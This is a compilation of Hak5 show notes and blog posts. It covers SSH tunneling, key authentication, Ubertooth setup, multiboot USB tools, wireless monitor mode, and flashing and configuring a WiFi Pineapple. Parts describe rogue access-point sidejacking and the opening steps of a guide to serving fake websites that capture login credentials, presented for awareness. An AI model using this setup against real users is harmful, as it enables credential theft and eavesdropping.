Download HD Download MP4

SSH Remote Forwarding: Relay local apache server through tunnel

# install apache server
darren@dk10$ sudo apt-get install apache2
# browse to http://localhost
# Relay port 8080 on remote host to 80 on local host
darren@dk10$ ssh -R 8080:localhost:80 aardwolf@relay.wifipineapple.com
# browse to http://relay.wifipineapple.com:8080

SSH Local Forward: Relay remote VNC server through tunnel

# install vnc client
darren@dk10$ sudo apt-get install vncviewer
# vnc to server without SSH (bad idea)
darren@dk10$ vncviewer rrs5204q6n.hak5.org:1
# setup SSH local forward
darren@dk10$ ssh -L 5901:localhost:5901 aardwolf@rrs5204q6n.hak5.org
# vnc to server through ssh tunnel
darren@dk10$ vncviewer localhost:1

Maintaining Persistent SSH tunnels in Linux

AutoSSH is a simple and effective utility for monitoring and maintaining persistent SSH connections, restarting the session as necessary. It can be downloaded from http://www.harding.motd.ca/autossh/ and is available for most *nix platforms. On Ubuntu:

# Install autossh
darren@dk10$ sudo apt-get install -y autossh
# The autossh -M option specifies which port to monitor the connection from
# The -N option is a regular openssh parameter which is passed from autossh to ssh, specifying that there is no remote command to execute.
# The & tells the shell, bash in our example, to run the command in the background.
darren@dk10$ autossh -M 20000 -N aardwolf@relay.wifipineapple.com &
# To find the process ID where autossh is running
darren@dk10$ pidof autossh
# And finally to stop autossh
darren@dk10$ kill `pidof autossh`

Maintaining Persistent SSH tunnels in Linux

• First of all we need to cover Plink. Short for Putty Link, the plink utility is the command-line equivalent to Putty on Windows. We'll be using this today along with another to in order to keep an SSH tunnel persistent.
• Here's an example of a plink SSH tunnel. We start by launching pageant and entering our passphrase. Now that our private key is in memory we can use plink to start an SSH tunnel from the command line.
• So open up CMD, navigate to where your plink utility is. For me that's by running "cd putty"
• Now run plink.exe -- you'll be greeted by a whole list of options for this command line utility.
• To start a simple Dynamic SOCKS proxy I'll enter:
• plink -D 8080 snubsie@peanut.hak5.org -agent
• The -D says make it a Dynamic SOCKS proxy on my local port 8080 and the -agent says to use pageant for the private key file.
• And there we go, a command to start our SOCKS proxy for all our tunneling enjoyment. Of course if the SSH connection is dropped we'll be all sad pants -- especially if we're using the tunnel to watch the BBC or something.
• And while autossh *is* available for Windows, sort of, it isn't exactly the easiest to setup. AutoSSH, the Linux program, can be run in Windows using Cygwin -- a Linux environment for Windows. If that suits your fancy, have at it. There's a decent tutorial for setting that up.
• That said I'm more interested in using native Windows programs. Thankfully a similar setup to autossh can be achieved using plink with the help of a little utility called MyEnTunnel.
• Short for My Encrypted Tunnel, MyEnTunnel is a windows utility that lives in the system tray, or can be run as an NT service in the background, that quietly watches Plink sessions and restarts them as necessary.
• MyEnTunnel is available from http://nemesis2.qx.net/pages/MyEnTunnel as freeware.

Download HD Download MP4

SSH Public Key Fingerprints and known_hosts

Typical SSH Servers user 128-bit MD5 hashes as Public Key Fingerprints. These are used to verify the authenticity of a server. These key fingerprints are short sequences of bytes used to authenticate a much longer public key. Like we discussed last week regarding key pairs for user authentication, SSH servers have key pairs for server authentication.

On a Linux OpenSSH server for example these key pairs will be found in /etc/ssh/*key*. The public keys will be world readable while the private keys can only be read by a superuser.

On a Linux client for example the key fingerprints of remembered servers are stored in ~/.ssh/known_hosts. Since SSH version 4 the username and hostnames associated with these servers are hashed.

To remotely verify the key fingerprint of an SSH server

ssh-keyscan -t rsa,dsa REMOTEHOSTNAME > /tmp/ssh_host_rsa_dsa_key.pub
ssh-keygen -l -f /tmp/ssh_host_rsa_dsa_key.pub

Alternatively, on the remote server the key fingerprints can be found by:

cd /etc/ssh
ls *key*
cat ssh_host_key # this is the private key
# permission will be denied if not superuser
cat ssh_host_key.pub # this is the public key
ssh-keygen -lf ssh_host_rsa_key.pub
# field 1 = bit length of key
# field 2 = fingerprint of key
# field 3 = name of key

Setting up a Windows SSH Server with Bitvise (+ A few other software recommendations)

Setting up the SSH Server Windows Using BitVise WinSSHd

• Download BitVise

• Creating a server on laptop or pc at home...
• Auto config router (UPnP) - BAD!! No Universal Plug-n-Play
• Open Port to Any Computer
• Uncheck 'Allow Any Logon', Click add.
• Enter Username - Run 'whoami' from CMD to find out your username.
• Want to add account for a friend? Do a virtual account.

SSH Servers for Windows

FreeSSHd - http://www.freesshd.com/

• Nice but lacks advanced security controls. The server starts
  sessions with security in the context of the service itself, meaning
  since it needs to be run as administrator or system those are the
  privileges available to the users.

• Not open source so it can't be vetted, improved upon by the community
• Hasn't been updated since 2009
• Difficult to get working on Windows 7
• Free and easy to setup

Bitvise WinSSHD - http://www.bitvise.com/winsshd

• Free for non-commercial / personal use

• License costs $100, unlocks Active Directory feature for enterprises
• Easy to install and update, nice GUI
• Supports Active Directory, Kerberos or it's own user database
• Works fine in Windows 7
• Supports AES 128 and 256 bit encryption
• Not open source so it can't be vetted, improved upon by the community
• Can be configured to use Power Shell instead of CMD as the default
  shell for users

• Supports OpenSSH public key files
• Configure account and group permissions per IP and DNS
• Automation API, logging

OpenSSH for Windows - SSHWindows.sf.net

• Free, open source implementation of OpenSSH with Cygwin

• Hasn't been updated since 2004
• Enough said

Copssh - https://www.itefix.no/i2/copssh

• Package of portable OpenSSH for Cygwin

• GUI for administartion

KpyM SSH Server - http://www.kpym.com/2/kpym/index.htm

• Free, open source

• Uses Windows identification (Windows user accounts)
• Automated install and setup
• Nag screen. Single license is $35

Setting up Key Pair Authentication in Linux with OpenSSH

On the remote host:

mkdir .ssh
chmod 700 .ssh
cd .ssh

On the local host:

ssh-keygen -t rsa
scp ~/.ssh/id_rsa.pub user@host:.ssh/authorized_keys2

Back on the remote host:

ls -la authorized_keys2
chmod 600 authorized_keys2
exit

On the local host:

ssh user@host

Bonus: Transfer SSH public keys from one machine to another

Now that we've done it the long way, let's take a moment to appreciate a convenient shortcut -- ssh-copy-id.

ssh-keygen; ssh-copy-id user@host; ssh user@host

Download HD Download MP4

Before getting into public key crypto we should first take a moment to gather a basic understanding of the SSH-2 protocol layers. In a nutshell the three layers of SSH-2 are:

The first is the Transport Layer. This layer is responsible for handling key exchanges, the servers authenticity (server authentication), compression, encryption and re-keying (typically after 1 GB of traffic or 1 Hour have elapsed). We'll get into more detail on this next week when we focus on key fingerprints.

Second is the User Authentication Layer, which handles client authentication, or authentication of the user trying to log-in. This process is client driven, meaning that the connecting client chooses which method they would like to authenticate with. Accepted methods vary by server but typically these include:

• Password Authentication - we used this last week by interactively typing in our password at the prompt when logging in

• Public Key - this is the method we'll be using today and going forward
• Keyboard Interactive - a process that can be used for one-time-passwords.
• GSSAPI (Generic Security Services Application Programming Interface) - this is actually a library used by commercial vendors, usually to implement single-sign-on services in enterprises and integrating with existing security services such as NTLM or Kerberos.

Finally there is the Connection Layer. This layer defines the channels, or asymmetric communications supported by SSH, including:

• Shell Channel for Shells, SFTP, SCP
• Direct-TCP/IP Channel for Client-to-Server forwards
• Forwarded-TCP/IP Channel for Server-to-Client forwards

Understanding Public Key Cryptography

Authentication via Asymmetric Key Cryptography (aka Public Key Crypto) is the method for generating a key pair -- both public and private (aka secret) -- and publishing one or the other in order to initiate secure communication. In our example we'll be protecting our private key on the client while publishing the public key on the SSH server. With this setup anything encrypted with the public key can be decrypted with our own private key. The oversimplification of this is that the key pairs are linked mathmatically allowing for encryption with the public key and decryption with the private key. The idea is that it's impractical to figure out the private key based on only knowledge of the public key. This is the basis for SSL, PGP, GPG, Bitcoin and many other protocols.

SSH-2 supports at least two methods for Public Key authentication

• RSA Key Pairs, which are named after creators Rivest, Shamir and Adleman and published in 1978 is an algorithm based on the difficulty of factoring large integers. Again the oversimplification is that the public key is based on the product of two large primes (along with an aux value) and the private key is derived from prime factors used to create the public key.

• DSA Key Pairs, or Digital Signature Algorithm, have been a Federal Information Processing Standard since 1993. Originally pantented by former NSA employee David Kravitz this technology is now freely available for anyone to use worldwide.

Setting up a Linux OpenSSH Server
On a Debian based Linux machine setting up ssh can be as simple as issuing "sudo apt-get install ssh". In this segment Darren goes over some of the configuration lines you would find useful to modify in /etc/ssh/sshd_config.

AllowTcpForwarding yes
GatewayPorts       yes
RSAAuthentication yes
PubkeyAuthentication yes
AuthorizedKeysFile      %h/.ssh/authorized_keys
AllowUsers bob alice
PermitRootLogin no
Protocol 2
Port 222
LoginGraceTime 1m
ListenAddress
ClientAliveInterval 60
ClientAliveCountMax 0

Be sure to restart the SSH deamon after editing the configuration. stop ssh;start ssh;service ssh restart;/etc/init.d/ssh restart #one of these should do it! :)

SSH Key Authentication On Windows with Putty for a Linux Server

This'll create key pair- an authorization to log on to server for authentication. Begin by downloading the Putty KeyGen tool. Click Generate and move mouse to generate key pair, and save both. Now open the server via Putty.

On the server go ahead and create a user if you haven't already done so. Typically this is achieved using the "adduser username" then "passwd username" commands.

Now, while logged in as your user, make a directory called .ssh in the your home. For example "mkdir ~/.ssh"

You'll want to change the mode to 700 so that only you have access to it. In the world of Unix there are 3 levels of permissions for files and directories. The Owner, Groups and World (everyone). The first 10 characters are the file's attributes. The first character represents what type of file it is. If it's a dash (-) it's a regular file. A (d) represents a directory, and there are a few others for special stuff like symbolic links. The next 9 characters specify the Read (r), Write (w) and Execute (x) permissions for the file's Owner, Groups and World (everyone). Change the mode of the directory with "chmod 700 .ssh/" The "chmod" command stands for Change Mode and allows you to easily modify a file or directory's permissions. Chmod will accept an octal representation of the modes. We're not going to get into them all but in this case 700 changes the file to be Readable, Writeable and Executable by the file's Owner, and nothing else for any Groups and the World.

Next change to the newly created directory with "cd .ssh" and create a file called authorized_keys2 with the public key on one line saved in file. Add ""ssh-rsa "" to the beginning.

Finally you'll want to again change the mode of the file so that only you can read and write to it. In this case the command would be "chmod 600 authorized_key2".

Now back on the Windows machine ppen pageant.exe and select 'add key'. Add the private key created in the initial setup. Pageant works as a passphrase keeper. With Pageant in memory and your private key loaded go ahead and test your connection. Just as before login with putty being sure to include "username@" before the hostname in the connection dialog.

You should now login without a password needed! Hooray! ]]> http://Hak5.org/episodes/hak5-1109/feed 8 http://Hak5.org/blog/backstage/1111 http://Hak5.org/blog/backstage/1111#comments Tue, 17 Apr 2012 01:15:42 +0000 Darren Kitchen http://Hak5.org/?p=4732 135 Park Pl Richmond, CA 94801. RSVP on Facebook or Add to Google Calendar.]]>

Thursday, May 3rd at 8:00 PM

Join us for our Season 11 episode 11 party at the Baltic Pub in Point Richmond, CA! There won’t be another binary episode number of Hak5 until Season 100 in 2057!!

All ages welcome. Special nerdcore performance by Dale Chase!

The Baltic Pub, 135 Park Pl Richmond, CA 94801.

RSVP on Facebook or Add to Google Calendar.

Download HD Download MP4

If you're into Hak5 you'll love our new show by hosts Darren Kitchen and Shannon Morse. Check out HakTip!

Whether you're a beginner or a pro, HakTip is essential viewing for current and aspiring hackers, computer enthusiasts, and IT professionals. With a how-to approach to all things Information Technology, HakTip breaks down the core concepts, tools, and techniques of Linux, Wireless Networks, Systems Administration, and more

And let's not forget to mention that you can follow us on Twitter and Facebook, Subscribe to the show and get all your Hak5 goodies, including the infamous WiFi Pineapple over at HakShop.com. If you have any questions or suggestions please feel free to contact us at feedback@hak5.org. ]]> http://Hak5.org/episodes/hak5-1101/feed 5 http://Hak5.org/episodes/hak5-920 http://Hak5.org/episodes/hak5-920#comments Thu, 07 Jul 2011 01:23:37 +0000 Darren Kitchen http://Hak5.org/?p=3817 ]]>

This time on the show, an Ubertooth One Primer – Setup with BackTrack 5. Booting multiple ISOs from a single USB drive, we’ve got plenty of options. And answers to your questions on A+ certs, programming languages, network scanning and more.

Download HD Download MP4 Download WMV

Ubertooth One Primer – Setup with BackTrack 5

We’ve been asked numerous times to do a segment on getting started with the Ubertooth One, and while it’s specific to this hardware in nature the techniques involved are similar to that of many other tools.

If you’re not familiar, the Ubertooth One is an open source bluetooth testing tool made by Mike Ossmann in response to the lack of good bluetooth testing devices, or the ridiculously high price tags in excess of $10,000 for commercial monitoring equipment.

So in the same sense that we have inexpensive WiFi adapters that can go into monitor or promiscuous mode, we now have the Ubertooth One.

Now props to HarvestGardener on the BackTrack Linux forums for putting a lot of this together. Most of the Ubertooth development was done on Mac OSX but getting it going in Linux isn’t too difficult, thankfully.

So today I aim to setup dependencies and compile Ubertooth Tools in Backtrack 5 linux host machine. Currently does not work in VM — Libusb issues.

The first dependency you’ll need is pyside. It’s a PySide adds Qt bindings to Python, letting it use the cross-platform UI framework for some graphical goodness. You can download it manually from PySide.org or simply install it with apt. Unfortunately it isn’t in the default BackTrack 5 repository so you’ll need to add a personal package archive or PPA.

apt-get install python-software-properties
add-apt-repository ppa:pyside
apt-get update
apt-get install libnl-dev libusb-1.0-0-dev pyside-tools

Next we’ll need the PyUSB extension which provides USB access to Python.

wget http://downloads.sourceforge.net/project/pyusb/PyUSB%201.0/1.0.0-alpha-1/pyusb-1.0.0-a1.tar.gz
tar xvf pyusb-1.0.0-a1.tar.gz
cd pyusb-1.0.0-a1
python setup.py install

We’ll also need bluetooth baseband libraries so we can process raw bluetooth data. Thankfully libbtbb does the trick:

wget http://downloads.sourceforge.net/project/libbtbb/libbtbb.0.5.tgz
tar xvf libbtb.0.5.tgz
cd libbtbb
make
make install

Ok so we’re finally to the part where we actually get to the Ubertooth code. As of recording the latest version of Ubertooth software is release 238.

wget http://downloads.sourceforge.net/project/ubertooth/ubertooth-r238.tar.gz
tar xvf ubertooth-r238.tar.gz

This archive contains the latest firmware for both the Ubertooth One and Ubertooth Zero, the KiCad files if you’re so inclined to make your own Ubertooth, documentation and host software including a few bluetooth tools, kismet plugins and a fun little spectrum analyzer.

Since Bluetooth operates in the same 2.4 GHz ISM band as WiFi, we can actually use the Ubertooth One as a basic spectrum analyzer and see all of the WiFi signals for a given area.

python specan_ui.py

Alright, that’s a lot of info so we’re going to stop right here and pick up next time with compiling Kismet from source with the Ubertooth Plugin, capturing our first Bluetooth packets, installing the Wireshark plugin and finally analyzing the good stuff. If you haven’t already checked it out you can find the Ubertooth One at HakShop.com along with the documentation and source files if you’re crafty with the soldering iron and eager to build your own.

Boot multiple ISOs from one USB with these free tools

Having several tools on several USB’s or CD’s can be a pain in the butt, especially when you’re looking for a specific one but don’t remember which USB you put it on. To save us from this trouble, there are many applications available online that let you create one multibootable USB drive. Thus, you can store all your tools on one USB drive instead of ten. We’ve reviewed YUMI, UNetBootin, Darren’s done his MultiPass, and I’ve checked out Katana. This week, I’m checking out a couple of your user picks, XBoot, and Sardu.

The first one is XBoot. Its a light weight utility for creating multiboot USB’s OR CD’s. To use it, download the zip file from their website. Open the application and plug in your USB flashdrive. Now, you’ll need to have some ISO’s already downloaded on to your computer or you can go to File–>Download and choose some of your favorite utilities and linux distros.
Once they are done installing, drag the ISO’s into the box under the Create Multiboot USB/ISO tab. For mine, I chose Ophcrack, Clonezilla, and Puppy Linux. On the side, you can see the total size of the files added, you can remove files, look up the MD5 hash checksum in case you’re wondering if it’s the actual tool, and at the bottom you can choose to create your ISO Live CD or USB bootable flash drive. I’m choosing my FlashDrive. Double check the Selected USB drive to make sure it’s not your operating system drive. Then, this is cool, you can choose your Bootloader. I’ll stick with the recommended Syslinux, but you can also choose Grub4dos or not install one at all.
Then, when you click next, it’ll start copying all your ISO’s to your thumbdrive and create the bootloader. This may take several minutes, so just kick back and relax.

Once the USB is created, you’ll have the option to run it on QEMU to test it. You can also edit the flashdrive, by clicking the tab that says Edit Multiboot USB.

The second one is Sardu. Sardu is a program I found that was apparently made by Vikings using hieroglyphics. You simply plug in your flashdrive, click on your choices for Antivirus, Utilities, Linux Distros, and/or Windows CD’s, and choose make bootable USB. Clicking on the different utilities and linux distros will download them from their websites. You can also click ISO at the top and choose Make ISO, then click on an ISO folder to choose it for your flashdrive. I downloaded all of mine into my downloads folder, so I just navigate to the downloads folder and click OK. When done, click the cute little USB button and wait for it to finish creating the bootable USB. Once done, you can boot off your flashdrive using SuperGrubDisk. The tabs at the top enable you to check the Hash, create and defrag your USB.

Now I’m going to restart my computer and boot into Syslinux for XBoot and Grub for Sardu and try them out!
Looks like it works, and works well. The three ISO’s that I chose boot properly, and I can add more if I want!”"

So of these two, I have to say Sardu for Vikings took a bit more time for me to figure out how to get my ISO’s onto the USB and make it bootable. Turns out, I was just thinking too hard when trying to add my ISO folders! Xboot was pretty natural to figure out and it was easier to use. Xboot was my definetly my favorite.

So after googling for other multiboot creators, I found all the ones I could, but are there other ones? Do you use a tool that could make my life easier? Email me at feedback@hak5.org

Bash and Airodump-ng tips

Whether you’re trying to copy a PID from TOP or a BSSID from airodump-ng, when your terminal is constantly refreshing the task is cumbersome at best. So calm that screen with the shortcut CTRL+s. To resume simply hit CTRL+q. And specific to airodump-ng not only can you pause the screen with ‘space bar’, but there are all sorts of handy keystrokes like ‘tab’ – which lets you to scroll up and down the list of stations, ‘s’ which changes the sorting column, and my favorite, ‘m’ which marks connection groups with a colors.

Thanks to Sitwon and Bethany for sending these in and getting some complimentary hak5 swag. Submit your 4-bits at hak5.org/nibble

If you’re into Hak5 you’ll love our new show by hosts Darren Kitchen and Shannon Morse. Check out HakTip!

Whether you’re a beginner or a pro, HakTip is essential viewing for current and aspiring hackers, computer enthusiasts, and IT professionals. With a how-to approach to all things Information Technology, HakTip breaks down the core concepts, tools, and techniques of Linux, Wireless Networks, Systems Administration, and more

And let’s not forget to mention that you can follow us on Twitter and Facebook, Subscribe to the show and get all your Hak5 goodies, including the infamous WiFi Pineapple over at HakShop.com. If you have any questions or suggestions please feel free to contact us at feedback@hak5.org.

We’re getting promiscuous, with wireless cards! As part of our foundation series of HakTips Darren covers the fundamentals of wireless packet sniffing with a practical approach in BackTrack Linux using the Aircrack-ng suite.

Download HD Download MP4 Download WMV

Let’s think about network traffic as a cocktail party. Picture Alice and Bob on the love seat chatting it up while Charlie is deep in conversation with Dave at the bar. Meanwhile, Eve is nearby sipping a Hendrix Martini listening in on everyone’s conversations.

You see, in order for Alice to send a message to Bob she has to address it to him by his network interfaces MAC address — or Media Access Control Address. This address is unique every network interface on the planet. Bob’s is going to be different from Charlie’s, Dave’s or anyone else.

On a hub based network, Alice’s message is heard by all. But by default when Charlie or Dave hear a message addressed to a mac address other their own, their network interface will drop the frame completely.

This is where promiscuous mode comes into play. If Eve’s network interface is in promiscuous mode she doesn’t drop frames not addressed to her. This is great for packet sniffing, say if Eve was a network administrator attempting to debug a faulty network. Likewise, if Eve had malicious intent the same applies to eavesdropping.

Now promiscuous mode assumes a hub based network. Switches thwart this by only sending messages to their intended recipients instead of everyone.

Which brings us to Monitor mode. Monitor mode, or RFMON for Radio Frequency Monitor, is one of six modes that wireless network interfaces can assume. Similar to Promiscuous mode, Monitor mode allows the wireless network interface to “sniff packets” not intended for it.

Unline promiscuous mode however, an interface in monitor mode can sniff packets from access points it isn’t even associated with. Again this is great for, say, an administrator troubleshooting a network, or on the darker side for malicious purposes such as eavesdropping and cracking encrypted networks.

What program or command is giving you warm fuzzies? Hit me up — tips@hak5.org

And be sure to check out our sister show, Hak5 for more great stuff just like this.

WIFI PINEAPPLE VERSION 2 ONLY. THIS WILL NOT WORK WITH THE WIFI PINEAPPLE VERSION 3.

Whether your new to Jasager or you’ve made a configuration change you wish you hadn’t, doing a fresh WiFi Pineapple install is a breeze. This guide walks you through the steps required to flash compatible WiFi Pineapple hardware with the latest version of Robin Wood’s Jasager firmware as well as default configurations and and packages.

Requirements

This guide is written for Windows users and should take about 15-20 minutes to complete. In addition to WiFi Pineapple hardware you’ll need a Telnet, SSH and SCP client (we recommend PuTTY and WinSCP) as well as an Ethernet cable and the following download:

• build-pineapple.zip MD5: C5D90DB48E511F8AEF4FDFBCA7E3CF38

Video Walkthrough

Preparing your computer

Before getting to the actual flashing bit the computer’s network interfaces must be configured. Begin by setting the Ethernet adapter with a static IP address of 192.168.1.100 and a subnet mask of 255.255.255.0. This setting can be found in Windows 7 from the Control Panel under View network status and tasks, and Change adapter settings. Right-click on the Local Area Connection and choose Properties. Select Internet Protocol Version 4 (TCP/IPv4) and click Properties.

It is also a good idea to disable any other network adapters that may be present, like a wireless adapter. To do this right-click on the interface and click Disable.

Flashing the Firmware

Plug one side of an Ethernet cable into the Ethernet adapter you set with a static address in the previous step. Plug the other end of the cable into the WiFi Pineapple hardware. Make sure the WiFi Pineapple does not have power, but keep the power cable handy as we’ll need it in just a moment. Using battery power for the flashing process is not advised.

Open the Freifunk AP51 Easy Flash utility. Check the box labeled Use external file under Rootfs, click browse, and select the openwrt-atheros-root.squashfs file. Repeat this step for the section labeled Kernel choosing openwrt-atheros-vmlinux.lzma

Select the Ethernet adapter you had previously setup with a static IP address from the drop-down under Interface.

With the WiFi Pineapple power cable handy click the Go button, wait one second and plug in the power cable. The WiFi Pineapple will light up and the EasyFlash utility will report “No packet” until the device is found. Once the utility is communicating with the device it will report both the computer and WiFi Pineapple‘s IP and MAC addresses then begin flashing. This process takes about 10 minutes. Once the flash is complete the EasyFlash utility will automatically close and the WiFi Pineapple will reboot.

Initial Setup

With the WiFi Pineapple rebooting, open a command prompt (Start, Run, CMD) and issue “ping 192.168.1.1 -t”. This command will continue pinging the WiFi Pineapple. Once replies are reported stop the ping with the CTRL+C keyboard combo. The device is now ready for initial login.

Open PuTTY or your Telnet client of choice and enter the host 192.168.1.1. If using PuTTY make sure Telnet is selected, as well as the default port 23. Click Open.

When greeted with an OpenWRT splash screen type the command “passwd” and press enter. Type a password and press enter twice. When “Password for root changed by root” is reported the WiFi Pineapple is now ready for packages and configuration.

Wireless Configuration

Once again open PuTTY or your SSH client of choice. Enter the host 192.168.1.1. If using PuTTY make sure SSH is selected, as well as the default port 22. Click Open.

When greeted with a security alert, click Yes. Enter “root” for “login as” and the password you had previously configured.

From the WiFi Pineapple command line enter the following command to change the wireless configuration setting.

echo "
config wifi-device  wifi0
option type    atheros
option channel  auto
config wifi-iface
option device wifi0
option network lan
option mode ap
option ssid Pineapple
option encryption none
" > /etc/config/wireless

Leave this SSH session window open as it will be used in the next step to install packages.

Package Install

Various packages can be installed on the WiFi Pineapple. See the openwrt repository at downloads.openwrt.org/kamikaze/8.09.2/atheros/packages. The default package on the WiFi Pineapple is X-WRT, a web based management interface, and its dependency haserl.

Open WinSCP and enter the host name 192.168.1.1. Enter root as the user name and the password chosen. Select SCP from the File protocol drop-down and click Login. If presented with two group errors, click OK — they are safe to ignore.

Select the haserl and webif package files from your hard disk on the left and drag them to the area on the right. The file transfer will begin.

Back in the SSH session enter the command “ls” followed by enter. The package files previously transferred should be reported. Now install both package files with the command “opkg install *.ipk”. This process will take just a minute. Once complete a “SUCCESS!” message will be reported. At this point the WiFi Pineapple has been configured and is ready to be rebooted. Either unplug and replug and power adapter or issue the command “reboot”.

The WiFi Pineapple has now been flashed and configured with factory default settings. This guide can be followed up with this article on logging into the WiFi Pineapple for the first time.

WIFI PINEAPPLE VERSION 2 ONLY. THIS WILL NOT WORK WITH THE WIFI PINEAPPLE VERSION 3.

In this segment Darren talks about Session Hijacking and demonstrates a tool from Errata Security called Hamster and Ferret that, in conjunction with a WiFi Pineapple, an ICS’d 3G connection and Tftpd32 we’re able to “sidejack” with our little man-in-the-middle setup. Lesson learned? Be suspicious of any wifi. Check for signatures of trusted networks and tunnel your traffic.

While the tethering WiFi Pineapple and laptop 3G technique in this segment is still quite valid, Darren now prefers to use BackTrack Linux as documented here.

So you’ve built, borrowed or bought a WiFi Pineapple and you’re new to OpenWRT and Jasager. Hopefully this guide will familiarize you with the many aspects of the the WiFi Pineapple. If you have specific questions please leave a comment or email feedback@hak5.org and we’ll try to keep this page updated.

This article will guide you through connecting to the WiFi Pineapple for the first time. For more in-depth how-to’s involving command line control, modules, using the white and black listing functions, sharing Internet access and more please consult the Jasager board on the Hak5 forums and keep an eye on the WiFi Pineapple category of the Hak5.org blog for future articles on these topics.

First and foremost

The WiFi Pineapple is a customized version of OpenWRT running the latest Jasager software by Robin Wood. Since OpenWRT is a Linux based wireless networking operating system you’ll want to be familiar with basic Linux and networking fundamentals.

Tools you’ll find handy

Right out of the box most everything can be configured with just about any web browser, but you’ll likely also want a tool or two to get a shell and transfer files. If you’re using Linux or Mac you already have the ssh and scp commands at your disposal. If you’re on Windows we recommend using the PuTTY and WinSCP GUI tools or the command-line equivelent Plink.

Battery Powering the Pineapple

The WiFi Pineapple requires 5V and 2A of DC power. If you’re looking to go mobile leave the wall-wart at home. Four AA rechargeable batteries work well at powering this puppy. It’s important to get AA batteries with a high mAh rating. We recommend no less than 2400, so pick up a few meant for digital cameras for best results. If your standard alkalines aren’t doing the trick it’s probably due to a low mAh rating. Check the packaging. Of course we recommend rechargeables over the landfill populating variety.

Connecting for the first time

There are many ways to connect to and configure a WiFi Pineapple. Here are a few:

Via Ethernet

Power up and connect an Ethernet cable between your computer and the router’s. In its stock configuration the WiFi Pineapple is configured with the static IPv4 address of 192.168.1.1. It is also setup to hand out IP addresses in the 192.168.1.0/24 range via DHCP. If your machine is configured to obtain an IP address automatically you should get something like 192.168.1.100 from it momentarily.

Configuring your interface to obtain an IP address from the WiFi Pineapple’s DHCP server

In case your computer is not already setup to obtain an IP address on the Ethernet interface from a DHCP server, here are quick instructions for some common operating systems.

Windows XP

Open Network Connections from the Control Panel. Right-click on the Local Area Connection and choose Properties. From the dialog select Internet Protocol TCP/IP and click Properties. From the General tab choose Obtain an IP address automatically and Obtain DNS server address automatically. Click OK twice.

Windows 7

Click Choose Network Status and Tasks from the Control Panel. Click Change adapter settings. Right click the Local Area Connection and choose Properties. Select Internet Protocol Version 4 and click Properties. Select Obtain and IP address automatically and Obtain DNS server address automatically, then click OK twice.

Linux / Mac

Open a terminal and issue ifconfig eth0 where eth0 is the Ethernet interface connected to the WiFi Pineapple. Check the inet addr reported. If it is not a 192.168.1.x address you’ll want to manually ask for an address from the DHCP server on the pineapple. Depending on your distribution the command to do this may be “dhclient eth0″ or “dhcpcd eth0″.

Via Wireless

By default the SSID of the WiFi Pineapple is either “Pineapple” or “OpenWRT” without encryption. Connect to it as you would to any ordinary wireless access point. The pineapple will assign you an IP address via DHCP. If for some reason your Wireless interface has not been configured to obtain an address automatically please consult the above instructions substituting your wireless interface for the Ethernet interface.

Via Serial

WiFi Pineapples bought or built on Fon 2100 or Accton MR3201A hardware sport shell access through a serial interface. For information on this access method please consult these fine documents:

• Fon Serial Cable at digininja.org
• LaFonera Hardware Serial-Cable-Port on dd-wrt.com

Accessing the Jasager Interface

Once connected via Ethernet or wireless you can point your web browser at the Jasager management interface. Here you can configure the interface, karma, mac address filtering, ssid white/black listing and execute commands on connected clients.

By default the Jasager interface can be found at http://192.168.1.1:1471. It’s important to note the :1471 bit as that specifies the non-standard port number of this http interface. Any modern web browser will work, be it Firefox, Chrome, Safari, Opera or Internet Explorer. I’ve even successfully used it with the text-only browser Lynx! You’ll need to login. By default the username is root and password is “pineapplesareyummy” (sans quotes).

Status / Main Controls

The options in this section allow you to control the wireless card and karma features. The SSID list is a list of SSIDs that the interface will either accept (whitelist mode) or ignore (blacklist mode). One thing to watch out for is that changing from blacklist to whitelist mode, and vise-versa does not reset the SSID list.

Connected Clients

The list of connected clients comes from a merger of wlanconfig output, information in the log file and the ARP cache. A blank IP address may mean the client hasn’t got an IP address or hasn’t used it for a while so it has slipped from the ARP table.
The dropdown list of commands allows you to add the clients SSID to the watch list and kick the MAC address. Kicking is not blocking a MAC, just temporarily disconnecting it, most clients will attempt to reconnect within seconds of being kicked. Kicking can be useful if you blacklist a SSID and need to remove any currently associated clients. I have an idea that this list will grow with useful commands such as blocking MAC addresses and initiating things such as nmap scans. Watch out for new features in version 2.

Log

All activity is logged to /karma/log/status.log which gets dumped out to the log window.

This guide builds on the Auto-Rickroll payload for the WiFi Pineapple. Following this guide you will be able to create a self-contained WiFi Pineapple or similar OpenWRT based wireless access point serving up faux websites to capture login credentials. The purpose of this article is to point out the simplicity of a phishing attack using the dnsmasq technique of the Auto-Rickroll payload, and how you can protect yourself from similar attacks. See the mitigation section at the bottom of the article for defense advice.

Demonstration

Before beginning please follow the instructions outlined in the Auto-Rickrolling WiFi-Pineapple article. Once complete we will:

1. Install PHP and dependencies
2. Configure PHP and HTTPD
3. Testing the PHP installation
4. Write redirection and capture scripts
5. Modify a website to capture credentials

Install PHP and dependencies

The installation of PHP on OpenWRT is pretty straight forward. Considering the size limitations and power of your typically embedded device such as the WiFi Pineapple and what we’re trying to achieve I have opted for the 4x build of PHP, rather than the newer 5x. Feel free to deviate if your needs require the newer features of 5.

Begin by downloading and installing the following packages from downloads.openwrt.org: libopenssl_0.9.8i-3.2_mips.ipk, php4_4.4.7-1_mips.ipk, php4-cgi_4.4.7-1_mips.ipk and zlib_1.2.3-5_mips.ipk

Alternatively, everything required for this hack can be downloaded in this archive.

Copy the package files (*.ipk) to the WiFi Pineapple in /root/ using the scp command in Linux or an SCP utility in Windows like WinSCP or Plink.

Open a shell on the WiFi Pineapple using your ssh client of choice (on Windows I recommend PuTTY) and login as root. You should already be located in /root/ after logging in. Issue the “pwd” command to be sure, or change directory to /root/ with “cd /root/”. Verify that the packages have been copied by issuing the “ls” to list the contents of the directory. You should see the four package files listed. To install them all issue “opkg install *.ipk”

After a few moments each package should be installed. Now it is time to configure PHP and the HTTP server.

Configure PHP and HTTPD

Two changes need to be made in order for the HTTP server to recognize .php files and process them correctly.

First we’ll need to add a line to the httpd.conf file in /etc/ so either open it with your favorite text editor (vi is already installed) or simply issue the command “echo “*.php:/usr/bin/php” >> /etc/httpd.conf”. Verify that the line has been added with “cat /etc/httpd.conf”

Next we’ll need to add a line to the php.ini file in /etc/. Again open the file in an editor or add the line with “echo “cgi.force_redirect 0″ >> /etc/php.ini” and verify with “grep cgi.force_redirect /etc/php.ini”

Now restart the web server either by issuing “/etc/init.d/httpd restart” or simpy rebooting the WiFi Pineapple with the “reboot” command. It’s also safe to simply unplug the power and plug it back in.

Once the HTTPD and PHP configuration files have been modified and the server has restarted we can move on to testing the PHP installation.

